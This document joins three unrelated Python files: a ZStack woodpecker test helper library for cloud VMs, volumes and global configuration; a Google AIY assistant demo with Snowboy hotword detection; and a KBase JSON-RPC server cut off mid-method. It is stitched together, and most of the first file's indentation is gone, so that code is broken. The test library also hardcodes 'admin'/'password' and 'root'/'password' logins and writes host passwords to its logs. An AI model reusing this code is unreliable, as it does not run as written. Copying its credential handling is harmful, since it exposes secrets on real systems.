test_util.test_logger('Action history: %s' % pre_robot_actions)
if not selector_type:
selector_type = action_select.default_strategy
action_selector = action_select.action_selector_table[selector_type]
return action_selector(action_list, pre_robot_actions, \
priority_actions).select()
def lib_get_test_stub():
    '''test_stub lib is not a global test library. It is a test suite level
    common lib. Test cases might be in different sub folders under the test
    suite folder. This function will help a test case to find and load
    test_stub.py.'''
import inspect
import zstacklib.utils.component_loader as component_loader
caller_info_list = inspect.getouterframes(inspect.currentframe())[1]
caller_path = os.path.realpath(caller_info_list[1])
test_stub_cl = component_loader.ComponentLoader('test_stub', os.path.dirname(caller_path), 4)
test_stub_cl.load()
return test_stub_cl.module
#---------------------------------------------------------------
#Robot actions.
def lib_create_data_vol_template_from_volume(target_vm, vm_target_vol=None):
import zstackwoodpecker.zstack_test.zstack_test_image as zstack_image_header
vm_inv = target_vm.get_vm()
backup_storage_uuid_list = lib_get_backup_storage_uuid_list_by_zone(vm_inv.zoneUuid)
new_data_vol_inv = vol_ops.create_volume_template(vm_target_vol.uuid, \
backup_storage_uuid_list, \
'vol_temp_for_volume_%s' % vm_target_vol.uuid)
new_data_vol_temp = zstack_image_header.ZstackTestImage()
new_data_vol_temp.set_image(new_data_vol_inv)
new_data_vol_temp.set_state(image_header.CREATED)
return new_data_vol_temp
def lib_create_volume_snapshot_from_volume(target_volume_snapshots, robot_test_obj, test_dict, cre_vm_opt=None):
target_volume_inv = \
target_volume_snapshots.get_target_volume().get_volume()
if not target_volume_snapshots.get_utility_vm():
ps_uuid = target_volume_inv.primaryStorageUuid
vol_utiltiy_vm = robot_test_obj.get_utility_vm(ps_uuid)
if not vol_utiltiy_vm:
            #create the utility vm on the given primary storage.
util_vm_opt = test_util.VmOption(cre_vm_opt)
instance_offering_uuid = util_vm_opt.get_instance_offering_uuid()
if not instance_offering_uuid:
instance_offering_uuid = res_ops.query_resource(res_ops.INSTANCE_OFFERING)[0].uuid
tag = tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'primaryStorage::allocator::uuid::%s' % ps_uuid)
possible_cluster = target_volume_inv.clusterUuid
if not possible_cluster:
possible_cluster = res_ops.query_resource_with_num(\
res_ops.CLUSTER, [], None, 0, 1)[0].uuid
cond = res_ops.gen_query_conditions('attachedClusterUuids', \
'=', possible_cluster)
possible_l2 = res_ops.query_resource(res_ops.L2_VLAN_NETWORK, \
cond)[0].uuid
cond = res_ops.gen_query_conditions('l2NetworkUuid', '=', \
possible_l2)
possible_l3 = res_ops.query_resource(res_ops.L3_NETWORK, \
cond)[0].uuid
util_vm_opt.set_l3_uuids([possible_l3])
vol_utiltiy_vm = lib_create_vm(util_vm_opt)
tag_ops.delete_tag(tag.uuid)
robot_test_obj.set_utility_vm(vol_utiltiy_vm)
test_dict.add_utility_vm(vol_utiltiy_vm)
vol_utiltiy_vm.check()
target_volume_snapshots.set_utility_vm(vol_utiltiy_vm)
return target_volume_snapshots.create_snapshot()
def lib_create_image_from_snapshot(target_snapshot):
snapshot_volume = target_snapshot.get_target_volume()
root_image_uuid = snapshot_volume.get_volume().rootImageUuid
root_img_inv = lib_get_image_by_uuid(root_image_uuid)
image_option = test_util.ImageOption()
image_option.set_name('creating_image_from_snapshot')
image_option.set_guest_os_type(root_img_inv.guestOsType)
image_option.set_bits(root_img_inv.bits)
image_option.set_root_volume_uuid(target_snapshot.get_snapshot().uuid)
image_option.set_backup_storage_uuid_list([root_img_inv.backupStorageRefs[0].backupStorageUuid])
target_snapshot.set_image_creation_option(image_option)
new_image_obj = target_snapshot.create_image_template()
return new_image_obj
def lib_create_data_volume_from_image(target_image):
bs_uuid = target_image.get_image().backupStorageRefs[0].backupStorageUuid
ps_uuid_list = \
lib_get_primary_storage_uuid_list_by_backup_storage(bs_uuid)
target_host_uuid = None
    #TODO: need to consider the multiple local storage condition, since zs 1.0
    # only supports 1 local storage per host.
ps_uuid = random.choice(ps_uuid_list)
ps_inv = lib_get_primary_storage_by_uuid(ps_uuid)
if ps_inv.type == inventory.LOCAL_STORAGE_TYPE:
        #local storage, need to assign a host
target_host_uuid = \
random.choice(lib_find_hosts_by_ps_uuid(ps_uuid)).uuid
new_volume = target_image.create_data_volume(ps_uuid, \
'new_volume_from_template_%s' % target_image.get_image().uuid, \
host_uuid = target_host_uuid)
return new_volume
#------- load balance related function
def lib_create_lb_listener_option(lbl_name = 'lb ssh test',\
lbl_protocol = 'tcp', lbl_port = 22, lbi_port = 22, lb_uuid = None):
'''
Create common load balancer listener option.
'''
lb_creation_option = test_util.LoadBalancerListenerOption()
lb_creation_option.set_name(lbl_name)
lb_creation_option.set_protocol(lbl_protocol)
lb_creation_option.set_load_balancer_port(lbl_port)
lb_creation_option.set_instance_port(lbi_port)
lb_creation_option.set_load_balancer_uuid(lb_uuid)
return lb_creation_option
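#A minimal usage sketch (not part of the original library): build a listener
#option that forwards load balancer port 80 to instance port 8080 on an
#existing load balancer; lb_uuid is assumed to be created elsewhere.
def _example_web_lb_listener_option(lb_uuid):
    return lib_create_lb_listener_option(lbl_name='lb web test', \
            lbl_protocol='tcp', lbl_port=80, lbi_port=8080, lb_uuid=lb_uuid)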
#------- over provision function --------
def lib_set_provision_memory_rate(rate):
return conf_ops.change_global_config('mevoco', 'overProvisioning.memory', rate)
def lib_set_provision_storage_rate(rate):
return conf_ops.change_global_config('mevoco', 'overProvisioning.primaryStorage', rate)
#--------QOS related function ---------
def lib_limit_volume_total_iops(instance_offering_uuid, iops, \
session_uuid = None):
return tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'%s::%d' % (vm_header.VOLUME_IOPS, iops),\
session_uuid)
def lib_limit_volume_bandwidth(instance_offering_uuid, bandwidth, \
session_uuid = None):
return tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'%s::%d' % (vm_header.VOLUME_BANDWIDTH, bandwidth),\
session_uuid)
def lib_limit_vm_network_bandwidth(instance_offering_uuid, bandwidth, \
outbound = True, session_uuid = None):
if outbound:
return tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'%s::%d' % (vm_header.NETWORK_OUTBOUND_BANDWIDTH, bandwidth),\
session_uuid)
else:
return tag_ops.create_system_tag('InstanceOfferingVO', \
instance_offering_uuid, \
'%s::%d' % (vm_header.NETWORK_INBOUND_BANDWIDTH, bandwidth),\
session_uuid)
#--------instance offering--------
def lib_create_instance_offering(cpuNum = 1, cpuSpeed = 16, \
memorySize = 536870912, name = 'new_instance', \
volume_iops = None, volume_bandwidth = None, \
net_outbound_bandwidth = None, net_inbound_bandwidth = None):
new_offering_option = test_util.InstanceOfferingOption()
new_offering_option.set_cpuNum(cpuNum)
new_offering_option.set_cpuSpeed(cpuSpeed)
new_offering_option.set_memorySize(memorySize)
new_offering_option.set_name(name)
new_offering = vm_ops.create_instance_offering(new_offering_option)
if volume_iops:
lib_limit_volume_total_iops(new_offering.uuid, volume_iops)
if volume_bandwidth:
lib_limit_volume_bandwidth(new_offering.uuid, volume_bandwidth)
if net_outbound_bandwidth:
lib_limit_vm_network_bandwidth(new_offering.uuid, net_outbound_bandwidth, outbound = True)
if net_inbound_bandwidth:
lib_limit_vm_network_bandwidth(new_offering.uuid, net_inbound_bandwidth, outbound = False)
return new_offering
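#
# Usage sketch (added; values are hypothetical): create a 2-CPU/1G offering
# whose VMs are capped at 1000 volume IOPS and 10MB/s outbound network
# bandwidth, wiring up the QoS system tags defined above.
def _example_create_qos_instance_offering():
    return lib_create_instance_offering(cpuNum = 2, memorySize = 1073741824, \
            name = 'qos_offering', volume_iops = 1000, \
            net_outbound_bandwidth = 10485760)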
def lib_get_reserved_memory():
return conf_ops.get_global_config_value('kvm', 'reservedMemory')
def lib_set_reserved_memory(value):
return conf_ops.change_global_config('kvm', 'reservedMemory', value)
def lib_get_active_host_number():
cond = res_ops.gen_query_conditions('state', '=', 'Enabled')
cond = res_ops.gen_query_conditions('status', '=', 'Connected', cond)
result = res_ops.query_resource_count(res_ops.HOST, cond)
return result
def lib_get_delete_policy(category = 'vm'):
'''
category could be vm, volume, image.
'''
return conf_ops.get_global_config_value(category, 'deletionPolicy')
def lib_get_vm_delete_policy():
return lib_get_delete_policy()
def lib_get_volume_delete_policy():
return lib_get_delete_policy('volume')
def lib_get_image_delete_policy():
return lib_get_delete_policy('image')
def lib_set_delete_policy(category = 'vm', value = 'Direct'):
'''
value could be Direct, Delay, Never
category could be vm, image, volume
'''
return conf_ops.change_global_config(category, 'deletionPolicy', value)
def lib_set_expunge_time(category = 'vm', value = 1):
'''
value could be 1~N
category could be vm, image, volume
'''
return conf_ops.change_global_config(category, 'expungePeriod', value)
def lib_get_expunge_time(category = 'vm'):
'''
category could be vm, volume, image.
'''
return conf_ops.get_global_config_value(category, 'expungePeriod')
def lib_update_test_state_object_delete_policy(category, policy, \
test_state_object):
'''
category could be vm, volume, image.
policy could be DIRECT, DELAY, NEVER
test_state_object is test_state.TestStageDict
'''
lib_set_delete_policy(category = category, value = policy)
if category == 'vm':
test_state_object.update_vm_delete_policy(policy)
elif category == 'volume':
        test_state_object.update_volume_delete_policy(policy)
    elif category == 'image':
        test_state_object.update_image_delete_policy(policy)
else:
test_util.test_fail('Category can only be vm, volume or image. But your input is: %s'% category)
test_util.test_logger('%s delete policy has been changed to %s' % \
(category, policy))
def lib_update_test_state_object_delete_delay_time(category, \
delay_time, test_state_object):
'''
category could be vm, volume, image.
delete_delay_time is an int value for seconds.
test_state_object is test_state.TestStageDict
'''
lib_set_expunge_time(category = category, value = delay_time)
if category == 'vm':
test_state_object.update_vm_delete_delay_time(delay_time)
elif category == 'volume':
test_state_object.update_volume_delete_delay_time(delay_time)
elif category == 'image':
test_state_object.update_image_delete_delay_time(delay_time)
else:
test_util.test_fail('Category can only be vm, volume or image. But your input is: %s'% category)
    test_util.test_logger('%s delete delay time has been changed to %s' % \
            (category, delay_time))
def lib_get_local_storage_reference_information(volume_uuid):
cond = res_ops.gen_query_conditions('volume.uuid', '=', volume_uuid)
ls_ref = res_ops.query_resource(res_ops.LOCAL_STORAGE_RESOURCE_REF, cond)
return ls_ref
def lib_get_local_storage_volume_host(volume_uuid):
ls_ref = lib_get_local_storage_reference_information(volume_uuid)
if ls_ref:
host_uuid = ls_ref[0].hostUuid
cond = res_ops.gen_query_conditions('uuid', '=', host_uuid)
return res_ops.query_resource(res_ops.HOST, cond)[0]
def lib_get_image_store_backup_storage():
for zone in res_ops.query_resource(res_ops.ZONE):
for bs_uuid in lib_get_backup_storage_uuid_list_by_zone(zone.uuid):
bs = lib_get_backup_storage_by_uuid(bs_uuid)
if bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
return bs
def lib_request_console_access(vm_uuid, session_uuid=None):
return cons_ops.request_console_access(vm_uuid, session_uuid)
def lib_get_vm_console_address(vm_uuid, session_uuid=None):
return cons_ops.get_vm_console_address(vm_uuid, session_uuid)
def lib_set_vm_console_password(vm_uuid, console_password, session_uuid=None):
return cons_ops.set_vm_console_password(vm_uuid, console_password, session_uuid)
def lib_delete_vm_console_password(vm_uuid, session_uuid=None):
return cons_ops.delete_vm_console_password(vm_uuid, session_uuid)
def lib_get_vm_console_password(vm_uuid, session_uuid=None):
return cons_ops.get_vm_console_password(vm_uuid, session_uuid)
def lib_get_ha_enable():
return conf_ops.get_global_config_value('ha', 'enable')
def lib_set_ha_enable(value):
return conf_ops.change_global_config('ha', 'enable', value)
def lib_get_ha_selffencer_maxattempts():
return conf_ops.get_global_config_value('ha', 'host.selfFencer.maxAttempts')
def lib_set_ha_selffencer_maxattempts(value):
return conf_ops.change_global_config('ha', 'host.selfFencer.maxAttempts', value)
def lib_get_ha_selffencer_storagechecker_timeout():
return conf_ops.get_global_config_value('ha', 'host.selfFencer.storageChecker.timeout')
def lib_set_ha_selffencer_storagechecker_timeout(value):
return conf_ops.change_global_config('ha', 'host.selfFencer.storageChecker.timeout', value)
def lib_get_reserved_primary_storage():
    return conf_ops.get_global_config_value('primaryStorage', 'reservedCapacity')
def lib_set_primary_storage_imagecache_gc_interval(value):
return conf_ops.change_global_config('primaryStorage', 'imageCache.garbageCollector.interval', value)
def lib_add_vm_sshkey(vm_uuid, sshkey, session_uuid = None):
return tag_ops.create_system_tag('VmInstanceVO', \
vm_uuid, \
'%s::%s' % (vm_header.SSHKEY, sshkey),\
session_uuid)
def lib_get_local_management_server_log_path():
return shell.call('zstack-ctl status | grep "log file:" | awk \'{print $3}\'')
def lib_get_remote_management_server_log_path(node_ip, node_username, node_password):
cmd = 'zstack-ctl status | grep "log file:" | awk \'{print $3}\''
return lib_execute_ssh_cmd(node_ip, node_username, node_password, cmd, 180)
def lib_get_local_management_server_log():
return shell.call('cat %s' % (lib_get_local_management_server_log_path()))
def lib_find_in_local_management_server_log(timestamp, *keywords):
datetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(timestamp))
cmd = 'grep "%s" %s' % (datetime, lib_get_local_management_server_log_path().strip())
try:
out = shell.call(cmd)
except:
return False
for line in out.splitlines():
line_match = True
for keyword in keywords:
if line.find(keyword) < 0:
line_match = False
break
if line_match:
return True
return False
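#
# Usage sketch (added; the keyword and UUID arguments are hypothetical
# examples): check whether any single management server log line stamped
# within the current second contains all the given keywords.
def _example_find_vm_creation_in_log(vm_uuid):
    return lib_find_in_local_management_server_log(time.time(), \
            'APICreateVmInstanceMsg', vm_uuid)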
def lib_count_in_local_management_server_log(timestamp, *keywords):
datetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(timestamp))
cmd = 'grep "%s" %s' % (datetime, lib_get_local_management_server_log_path().strip())
try:
out = shell.call(cmd)
except:
return 0
match = 0
for line in out.splitlines():
line_match = True
for keyword in keywords:
if line.find(keyword) < 0:
line_match = False
break
if line_match:
match += 1
return match
def lib_find_in_remote_management_server_log(node_ip, node_username, node_password, timestamp, *keywords):
datetime = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(timestamp))
if lib_get_remote_management_server_log_path(node_ip, node_username, node_password) == False:
return False
else:
cmd = 'grep "%s" %s | cat' % (datetime, lib_get_remote_management_server_log_path(node_ip, node_username, node_password).strip())
try:
out = lib_execute_ssh_cmd(node_ip, node_username, node_password, cmd, 180)
except:
return False
for line in out.splitlines():
line_match = True
for keyword in keywords:
if line.find(keyword) < 0:
line_match = False
break
if line_match:
return True
return False
def lib_update_instance_offering(offering_uuid, cpuNum = None, cpuSpeed = None, \
memorySize = None, name = None, \
volume_iops = None, volume_bandwidth = None, \
net_outbound_bandwidth = None, net_inbound_bandwidth = None):
    systemTags = ''
updated_offering_option = test_util.InstanceOfferingOption()
if cpuNum:
updated_offering_option.set_cpuNum(cpuNum)
#if cpuSpeed:
# updated_offering_option.set_cpuSpeed(cpuSpeed)
if memorySize:
updated_offering_option.set_memorySize(memorySize)
if name:
updated_offering_option.set_name(name)
    if volume_iops:
        systemTags += '%s::%d,' % (vm_header.VOLUME_IOPS, volume_iops)
    if volume_bandwidth:
        systemTags += '%s::%d,' % (vm_header.VOLUME_BANDWIDTH, volume_bandwidth)
    if net_outbound_bandwidth:
        systemTags += '%s::%d,' % (vm_header.NETWORK_OUTBOUND_BANDWIDTH, net_outbound_bandwidth)
    if net_inbound_bandwidth:
        systemTags += '%s::%d,' % (vm_header.NETWORK_INBOUND_BANDWIDTH, net_inbound_bandwidth)
    if systemTags:
        systemTags = systemTags.rstrip(',')
    else:
        systemTags = None
return vm_ops.update_instance_offering(updated_offering_option, offering_uuid, systemTags)
version_is_mevoco = None
def lib_check_version_is_mevoco():
global version_is_mevoco
if version_is_mevoco != None:
return version_is_mevoco
try:
lic_ops.get_license_info()
version_is_mevoco = True
except:
version_is_mevoco = False
return version_is_mevoco
version_is_mevoco_1_8 = None
def lib_check_version_is_mevoco_1_8():
global version_is_mevoco_1_8
if version_is_mevoco_1_8 != None:
return version_is_mevoco_1_8
if shell.call('zstack-ctl status').find('version: 1.8') >= 0:
version_is_mevoco_1_8 = True
else:
version_is_mevoco_1_8 = False
return version_is_mevoco_1_8
def lib_get_host_cpu_prometheus_data(mn_ip, end_time, interval, host_uuid):
cmd = '/usr/bin/zstack-cli LogInByAccount accountName=admin password=password'
if not lib_execute_ssh_cmd(mn_ip, 'root', 'password', cmd):
test_util.test_fail('zstack-cli login failed')
cmd = """/usr/bin/zstack-cli PrometheusQueryPassThrough endTime=%s relativeTime=%s expression='collectd:collectd_cpu_percent{hostUuid=\\"%s\\",type=\\"user\\"}'""" % (end_time, interval, host_uuid)
rsp = lib_execute_ssh_cmd(mn_ip, 'root', 'password', cmd)
if not rsp:
test_util.test_fail('%s failed' % (cmd))
return rsp
def lib_get_file_size(host, file_path):
command = "du -sb %s | awk '{print $1}'" % file_path
eout = ''
try:
if host.sshPort != None:
(ret, out, eout) = ssh.execute(command, host.managementIp, host.username, host.password, port=int(host.sshPort))
else:
(ret, out, eout) = ssh.execute(command, host.managementIp, host.username, host.password)
test_util.test_logger('[file:] %s was found in [host:] %s' % (file_path, host.managementIp))
return out
except:
#traceback.print_exc(file=sys.stdout)
test_util.test_logger('Fail to execute: ssh [host:] %s with [username:] %s and [password:] %s to get size of [file:] %s . This might be expected behavior.'% (host.managementIp, host.username, host.password, file_path))
test_util.test_logger('ssh execution stderr output: %s' % eout)
test_util.test_logger(linux.get_exception_stacktrace())
return 0
def ip2num(ip):
    ip = [int(x) for x in ip.split('.')]
    return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]
def num2ip(num):
    return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24,
                            (num & 0x00ff0000) >> 16,
                            (num & 0x0000ff00) >> 8,
                            num & 0x000000ff)
def get_ip(start_ip, end_ip):
start = ip2num(start_ip)
end = ip2num(end_ip)
return [ num2ip(num) for num in range(start, end+1) if num & 0xff ]
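#
# Worked example (added sketch): ip2num/num2ip are inverses over dotted quads,
# and get_ip drops any address whose last octet is 0 (a network address).
def _demo_ip_helpers():
    assert ip2num('10.0.0.1') == 0x0A000001
    assert num2ip(0x0A000001) == '10.0.0.1'
    # 10.0.1.0 is skipped because its last octet is 0
    assert get_ip('10.0.0.254', '10.0.1.1') == \
            ['10.0.0.254', '10.0.0.255', '10.0.1.1']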
|
assistant_library_with_snowboy_demo.py
|
#!/usr/bin/env python3
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Run a recognizer using the Google Assistant Library with button support.
The Google Assistant Library has direct access to the audio API, so this Python
code doesn't need to record audio. Hot word detection "OK, Google" is supported.
It is available for Raspberry Pi 2/3 only; Pi Zero is not supported.
"""
import logging
import platform
import sys
import threading
import aiy.assistant.auth_helpers
import aiy.audio
from aiy.assistant.library import Assistant
import aiy.voicehat
from google.assistant.library.event import EventType
import mod.snowboydecoder as snowboydecoder
if len(sys.argv) == 1:
print("Error: need to specify model name")
print("Usage: python demo.py your.model")
sys.exit(-1)
model = sys.argv[1]
logger = logging.getLogger("main")
logging.basicConfig(
level=logging.INFO,
format="[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
)
class MyAssistant(object):
"""An assistant that runs in the background.
The Google Assistant Library event loop blocks the running thread entirely.
To support the button trigger, we need to run the event loop in a separate
thread. Otherwise, the on_button_pressed() method will never get a chance to
be invoked.
"""
def __init__(self):
self._task = threading.Thread(target=self._run_task)
self._hotword = threading.Thread(target=self._run_hotword)
self._can_start_conversation = False
self._assistant = None
def start(self):
"""Starts the assistant.
Starts the assistant event loop and begin processing events.
"""
self._task.start()
self._hotword.start()
def _run_task(self):
credentials = aiy.assistant.auth_helpers.get_assistant_credentials()
with Assistant(credentials) as assistant:
self._assistant = assistant
for event in assistant.start():
self._process_event(event)
def _run_hotword(self):
detector = snowboydecoder.HotwordDetector(model, sensitivity=0.5)
with aiy.audio.get_recorder():
while True:
if self._can_start_conversation:
detector.start(detected_callback=self._on_button_pressed,
interrupt_check=lambda: not(self._can_start_conversation),
sleep_time=0.03)
detector.terminate()
def _process_event(self, event):
logger.debug(event)
status_ui = aiy.voicehat.get_status_ui()
if event.type == EventType.ON_START_FINISHED:
status_ui.status('ready')
self._can_start_conversation = True
# Start the voicehat button trigger.
aiy.voicehat.get_button().on_press(self._on_button_pressed)
if sys.stdout.isatty():
print('Say "OK, Google" or press the button, then speak. '
'Press Ctrl+C to quit...')
elif event.type == EventType.ON_CONVERSATION_TURN_STARTED:
self._can_start_conversation = False
status_ui.status('listening')
elif event.type == EventType.ON_END_OF_UTTERANCE:
status_ui.status('thinking')
elif (event.type == EventType.ON_CONVERSATION_TURN_FINISHED
or event.type == EventType.ON_CONVERSATION_TURN_TIMEOUT
or event.type == EventType.ON_NO_RESPONSE):
status_ui.status('ready')
self._can_start_conversation = True
elif event.type == EventType.ON_ASSISTANT_ERROR and event.args and event.args['is_fatal']:
sys.exit(1)
def _on_button_pressed(self):
# Check if we can start a conversation. 'self._can_start_conversation'
# is False when either:
# 1. The assistant library is not yet ready; OR
# 2. The assistant library is already in a conversation.
if self._can_start_conversation:
self._assistant.start_conversation()
def main():
if platform.machine() == 'armv6l':
print('Cannot run hotword demo on Pi Zero!')
exit(-1)
MyAssistant().start()
if __name__ == '__main__':
main()
|
MyContigFilter3Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from MyContigFilter3.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'MyContigFilter3'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from MyContigFilter3.MyContigFilter3Impl import MyContigFilter3 # noqa @IgnorePep8
impl_MyContigFilter3 = MyContigFilter3(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
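# Illustration (added sketch): the encoder above makes sets and frozensets
# JSON-serializable by converting them to lists, e.g.:
def _demo_json_object_encoder():
    return json.dumps({'ids': set([1, 2])}, cls=JSONObjectEncoder)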
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
        if 'types' in self.method_data[request['method']]:  # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
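# Illustration (added sketch, hypothetical addresses): when the X-*-IP headers
# are trusted (the default), the first X-Forwarded-For hop wins over
# REMOTE_ADDR.
def _demo_get_ip_address():
    env = {'HTTP_X_FORWARDED_FOR': '203.0.113.7, 10.0.0.2',
           'REMOTE_ADDR': '10.0.0.1'}
    return getIPAddress(env)  # -> '203.0.113.7'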
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'MyContigFilter3'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_MyContigFilter3.filter_contigs,
name='MyContigFilter3.filter_contigs',
types=[dict])
self.method_authentication['MyContigFilter3.filter_contigs'] = 'required' # noqa
self.rpc_service.add(impl_MyContigFilter3.status,
name='MyContigFilter3.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
